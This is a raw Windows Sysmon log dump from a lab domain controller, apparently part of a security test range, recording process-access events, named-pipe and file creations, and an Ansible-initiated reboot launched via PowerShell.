12:00:02.654{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000775Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:02.654{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000774Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.654{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000773Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:02.654{266CAFBE-62C8-6064-0500-00000000AD01}6201152C:\Windows\system32\csrss.exe{266CAFBE-6442-6064-E502-00000000AD01}2856C:\Windows\system32\shutdown.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x8000000000000000772Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.654{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000771Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:02.654{266CAFBE-6442-6064-E402-00000000AD01}46005052C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{266CAFBE-6442-6064-E502-00000000AD01}2856C:\Windows\system32\shutdown.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+384236|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2c4179|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+91a057e9|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+90e88c72|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+90e888ad|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+91950bab|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+90e4581f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+90ea9291|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+90e8b2a0|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+90e8b2a0|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+90e8b131|C:\Windo
ws\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+90e7be51|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+90e89393|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+90e88f60|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+90e88c72|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+90e888ad|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+91950bab|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+90e6db58|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+90e6d0ca 154100x8000000000000000770Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.666{266CAFBE-6442-6064-E502-00000000AD01}2856C:\Windows\System32\shutdown.exe10.0.14393.0 (rs1_release.160715-1616)Windows Shutdown and Annotation ToolMicrosoft® Windows® Operating SystemMicrosoft CorporationSHUTDOWN.EXE"C:\Windows\system32\shutdown.exe" /r /t 2 /c "Reboot initiated by Ansible"C:\Users\Administrator\ATTACKRANGE\Administrator{266CAFBE-6441-6064-D466-120000000000}0x1266d40HighMD5=547993395376742A437D3145AF6B0309,SHA256=F96073C3442EA0A99B4945394007602772DB36732D1511DC2068519526678F8A,IMPHASH=609F1D7580ED496A3076AEBA77DAFC7E{266CAFBE-6442-6064-E402-00000000AD01}4600C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive 
-ExecutionPolicy Unrestricted -EncodedCommand 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 10341000x8000000000000000769Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.592{266CAFBE-62DA-6064-0B00-00000000AD01}8562840C:\Windows\system32\lsass.exe{266CAFBE-6442-6064-E402-00000000AD01}4600C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000768Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:02.592{266CAFBE-62DA-6064-0B00-00000000AD01}8562840C:\Windows\system32\lsass.exe{266CAFBE-6442-6064-E402-00000000AD01}4600C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 17141700x8000000000000000767Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-CreatePipe2021-03-31 12:00:02.576{266CAFBE-6442-6064-E402-00000000AD01}4600\PSHost.132616656025102059.4600.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x8000000000000000766Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.560{266CAFBE-6442-6064-E402-00000000AD01}4600ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_qxs1offs.qib.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000765Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:02.560{266CAFBE-6442-6064-E402-00000000AD01}4600ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_qha0iw5x.nbr.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x8000000000000000764Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.545{266CAFBE-6442-6064-E402-00000000AD01}4600C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_qha0iw5x.nbr.ps12021-03-31 12:00:02.545 10341000x8000000000000000763Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.529{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6442-6064-E402-00000000AD01}4600C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000762Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:02.498{266CAFBE-6441-6064-DE02-00000000AD01}27844880C:\Windows\system32\conhost.exe{266CAFBE-6442-6064-E402-00000000AD01}4600C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000761Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.498{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000760Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:02.498{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000759Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.498{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000758Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:02.498{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000757Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.498{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000756Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:02.498{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000755Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.498{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000754Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:02.498{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000753Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.498{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000752Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:02.498{266CAFBE-62C8-6064-0500-00000000AD01}6201152C:\Windows\system32\csrss.exe{266CAFBE-6442-6064-E402-00000000AD01}4600C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x8000000000000000751Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.498{266CAFBE-6442-6064-E302-00000000AD01}30203016C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{266CAFBE-6442-6064-E402-00000000AD01}4600C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+384236|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2c4179|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+e7a0fff4(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+e6e9347d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+e6e930b8(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+e795b3b6(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+e6e5002a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233
